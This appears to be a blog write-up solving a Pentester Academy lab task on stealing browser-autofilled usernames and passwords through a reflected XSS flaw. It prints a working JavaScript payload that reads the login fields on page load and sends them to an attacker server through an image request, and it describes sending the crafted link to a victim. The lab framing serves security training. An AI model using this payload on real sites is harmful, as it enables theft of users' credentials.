Hello Pentesters, today I am going to post another solution to the task provided at Javascript for Pentester at Pentester Academy. This task is bit different, you will learn how to grab the auto-fills of the website if it is vulnerable to XSS. Modern web browsers do not seem to autofill the username & passwords, you may have to try some old browser for this task. You can view solutions to the other tasks here.

Task 12: Stealing from Auto-Complete | Task Link

Provided that url parameter of the URL is vulnerable to XSS injection, we can verify it by using some injections on it.

<script>
var formcon = document.forms[0];
window.onload = get;
function get()
{
var un = formcon.elements[0].value;
var up = formcon.elements[1].value;
var a = document.createElement('img');
a.src = 'http://localhost:8000/f?'+'username='+un+'&password='+up;
document.body.appendChild(a);
}
</script>

Copy and URL-encode the code and paste it after the ’url’ parameter on the same page and send it to your victim. When our victim opens the link then the username and password filled by autofill will be sent to attacker machine with that newly created img tag. You can also use some other techniques to send user details like with XMLHttpRequest.
That’s all. Refer this post as a quick solution for the Javascript for Pentester tasks. For an in-depth video tutorial, please refer to the video solutions provided at Pentester Academy website.